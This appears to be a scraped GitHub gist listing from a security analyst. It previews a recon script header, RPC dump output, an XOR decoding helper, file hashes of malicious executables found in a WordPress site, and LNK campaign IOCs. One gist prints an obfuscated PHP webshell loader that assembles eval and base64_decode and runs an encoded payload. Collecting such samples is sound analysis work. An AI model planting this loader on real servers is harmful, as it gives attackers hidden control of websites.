mattnotmax mattnotmax

## Get-ComputerDetail.ps1
function Get-ComputerDetail
{
<#
.SYNOPSIS

This script is used to get useful information from a computer.

Function: Get-ComputerDetail
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None

## rpc_dump_rs5.txt
--------------------------------------------------------------------------------
<WinProcess "smss.exe" pid 368 at 0x5306908L>
64
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ffec24f0000
--------------------------------------------------------------------------------
<WinProcess "csrss.exe" pid 472 at 0x5306e48L>
64

Interfaces :
Endpoints :

## multi-xor.py
import binascii # This imports some functions used to convert data to hex values

data = "4d5a90000300000004000000ffff0000b8000000" # string representation of hex bytes start of executable file (notice the 4d 5a 'MZ' header).
text_key = "AABB" # string representation of the XOR key. This can be as long as you like

hex_data = (binascii.unhexlify(data)) # convert the data to Python hex type
hex_key = (binascii.unhexlify(text_key)) # convert the key to Python hex type


print(f"\nXOR Key is {hex_key}")

## php_webshell
 <?php
 $func="cr"."ea"."te_"."fun"."ction";   $x=$func("\$c","e"."v"."al"."('?
 >'.base"."64"."_dec"."ode(\$c));");


$x("PD9waHAgJHsiR1x4NGNceDRmQlx4NDFceDRjUyJ9WyJceDZhXHg2Nlx4NjRceDYxXHg2OGl2anEiXT0iXHg0MVx4NmUwXHg2ZVx4NWYzXHg3OFx4NTBceDZjb1x4NjlceDU0ZVIiOyRyeWh0bmVsaW5sPSJceDU1XHg2NVx4NThwbFx4NmZceDY5VCI7JHsiXHg0N1x4NGNceDRmXHg0Mlx4NDFMXHg1MyJ9WyJ3XHg2N1x4NjN3XHg3YXhceDc1XHg2YVx4N2EiXT0iVWVceDU4cFx4NmNceDZmXHg2OVQiOyR7JHsiXHg0N1x4NGNceDRmXHg0MkFMXHg1MyJ9WyJceDc3Z2NceDc3XHg3YXhceDc1alx4N2EiXX09Ilx4NTNceDc5XHgzMVx4NGNceDdhXHg0ZUZceDUxS1x4NzlceDdhTlx4NGM3XHg0N1x4MzJWMFx4NzNceDc2XHg3M1x4NTlceDU5XHg3N1x4MzlceDU5cFx4NGNceDY5dUtMOGtceDczXHg0ZFx4NmFUXHg1OFx4NTNceDcxXHg3YUx6MG5JXHg1M1MxS1x4NDJyXHg0ZVx4NGJceDM4XHgzNVB6XHg2M1x4NjdxXHg0Y1x4NTVceDM0bVx4NGNxXHg0M1x4NDNceDYzXHg2Y1x4NDZxZVx4NjFceDZkXHg2M1x4NTNuXHg3MFx4NDNceDYyblx4NzBceDM2UnFceDQxXHg0Zlx4MzBzXHg1M1x4NjkzXHg1NFVISFx4NGRNOFx4NjlceDRjXHg0ZVx4MzY0SXlNXHg2ZVx4NTBEXHg0NWtOXHgzMGtceDUxXHg0MzFceDY3XHg0MVx4M2QiOyR7JHsiR1x4NGNPXHg0Mlx4NDFceDRjXHg1MyJ9WyJqXHg2Nl

## gist:9803b909a419ce5d39274a812f43283a
5322bfad7552824f59a50601fd560a7563353e0e14f0850bcfcf6b1d5188b5dc  ./wp-admin/maint/files/jiz.exe
51e23b83563ac613705ec3fc77f413157a7e9622e43611d81068b73fb38b617b  ./wp-admin/maint/files/ag.exe
d0a5e15ab3473f7c9a0901118c68195ab28f05ce802c03151062c1abbed06f6b  ./wp-admin/maint/files/buk.exe
fd55935fd0fd16df3398ea907e6007bda13c04fdf32060903deec51e63204829  ./wp-admin/maint/files/sol.exe
316e2a45c914219de7bdcaa27304d40412e8d85f21016ce8923c1de6d48f2a7a  ./wp-admin/maint/files/obi.exe
f5c5bb6cc50ad8b292fee420d4aef9d5100d6703f6ef10b52fe98d98ce9bee54  ./wp-admin/maint/files/chb.exe
57f015403452d47f7ccaf41dc8cd8b42b658ddf638d194684613211a2a13102c  ./wp-admin/images/files/coc.exe
af9f1fa67d9f21a777af09c9edcd8eba3765b556551a04dcb95b8163cd3b0c6d  ./wp-admin/images/files/ali.exe
fcc1b2a65d8257e0d23e5bd91ccfc6779f8ef76cca2f9e7ede5b2201406cc74d  ./wp-admin/images/files/ago.exe
3c66fce4acacbb152f3da7155b1726df1bad8e28ffe5a4cd643303aedd1368f1  ./wp-admin/images/files/eze.exe

## LNK_IOCs.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                mattnotmax
                / LNK_IOCs.md
            
            
              Last active
              May 28, 2020 11:39
            
              
                Hashes from LNK file campaign
              
          
    Original File

7eb4ea6277bd62653cc474cf1125165c9bdc43858811c0d88be25e2ec34bc14d
k.dll

95b2d037d67d77d313a7c97912674e365dcd98ceb6f8942ef3d450abf20bf472
screenshots.dll
	function Get-ComputerDetail
	{
	<#
	.SYNOPSIS

	This script is used to get useful information from a computer.

	Function: Get-ComputerDetail
	Author: Joe Bialek, Twitter: @JosephBialek
	Required Dependencies: None
	--------------------------------------------------------------------------------
	<WinProcess "smss.exe" pid 368 at 0x5306908L>
	64
	[!!] Invalid rpcrt4 base: 0x0 vs 0x7ffec24f0000
	--------------------------------------------------------------------------------
	<WinProcess "csrss.exe" pid 472 at 0x5306e48L>
	64

	Interfaces :
	Endpoints :
	import binascii # This imports some functions used to convert data to hex values

	data = "4d5a90000300000004000000ffff0000b8000000" # string representation of hex bytes start of executable file (notice the 4d 5a 'MZ' header).
	text_key = "AABB" # string representation of the XOR key. This can be as long as you like

	hex_data = (binascii.unhexlify(data)) # convert the data to Python hex type
	hex_key = (binascii.unhexlify(text_key)) # convert the key to Python hex type


	print(f"\nXOR Key is {hex_key}")
	<?php
	$func="cr"."ea"."te_"."fun"."ction"; $x=$func("\$c","e"."v"."al"."('?
	>'.base"."64"."_dec"."ode(\$c));");


	$x("PD9waHAgJHsiR1x4NGNceDRmQlx4NDFceDRjUyJ9WyJceDZhXHg2Nlx4NjRceDYxXHg2OGl2anEiXT0iXHg0MVx4NmUwXHg2ZVx4NWYzXHg3OFx4NTBceDZjb1x4NjlceDU0ZVIiOyRyeWh0bmVsaW5sPSJceDU1XHg2NVx4NThwbFx4NmZceDY5VCI7JHsiXHg0N1x4NGNceDRmXHg0Mlx4NDFMXHg1MyJ9WyJ3XHg2N1x4NjN3XHg3YXhceDc1XHg2YVx4N2EiXT0iVWVceDU4cFx4NmNceDZmXHg2OVQiOyR7JHsiXHg0N1x4NGNceDRmXHg0MkFMXHg1MyJ9WyJceDc3Z2NceDc3XHg3YXhceDc1alx4N2EiXX09Ilx4NTNceDc5XHgzMVx4NGNceDdhXHg0ZUZceDUxS1x4NzlceDdhTlx4NGM3XHg0N1x4MzJWMFx4NzNceDc2XHg3M1x4NTlceDU5XHg3N1x4MzlceDU5cFx4NGNceDY5dUtMOGtceDczXHg0ZFx4NmFUXHg1OFx4NTNceDcxXHg3YUx6MG5JXHg1M1MxS1x4NDJyXHg0ZVx4NGJceDM4XHgzNVB6XHg2M1x4NjdxXHg0Y1x4NTVceDM0bVx4NGNxXHg0M1x4NDNceDYzXHg2Y1x4NDZxZVx4NjFceDZkXHg2M1x4NTNuXHg3MFx4NDNceDYyblx4NzBceDM2UnFceDQxXHg0Zlx4MzBzXHg1M1x4NjkzXHg1NFVISFx4NGRNOFx4NjlceDRjXHg0ZVx4MzY0SXlNXHg2ZVx4NTBEXHg0NWtOXHgzMGtceDUxXHg0MzFceDY3XHg0MVx4M2QiOyR7JHsiR1x4NGNPXHg0Mlx4NDFceDRjXHg1MyJ9WyJqXHg2Nl
	5322bfad7552824f59a50601fd560a7563353e0e14f0850bcfcf6b1d5188b5dc ./wp-admin/maint/files/jiz.exe
	51e23b83563ac613705ec3fc77f413157a7e9622e43611d81068b73fb38b617b ./wp-admin/maint/files/ag.exe
	d0a5e15ab3473f7c9a0901118c68195ab28f05ce802c03151062c1abbed06f6b ./wp-admin/maint/files/buk.exe
	fd55935fd0fd16df3398ea907e6007bda13c04fdf32060903deec51e63204829 ./wp-admin/maint/files/sol.exe
	316e2a45c914219de7bdcaa27304d40412e8d85f21016ce8923c1de6d48f2a7a ./wp-admin/maint/files/obi.exe
	f5c5bb6cc50ad8b292fee420d4aef9d5100d6703f6ef10b52fe98d98ce9bee54 ./wp-admin/maint/files/chb.exe
	57f015403452d47f7ccaf41dc8cd8b42b658ddf638d194684613211a2a13102c ./wp-admin/images/files/coc.exe
	af9f1fa67d9f21a777af09c9edcd8eba3765b556551a04dcb95b8163cd3b0c6d ./wp-admin/images/files/ali.exe
	fcc1b2a65d8257e0d23e5bd91ccfc6779f8ef76cca2f9e7ede5b2201406cc74d ./wp-admin/images/files/ago.exe
	3c66fce4acacbb152f3da7155b1726df1bad8e28ffe5a4cd643303aedd1368f1 ./wp-admin/images/files/eze.exe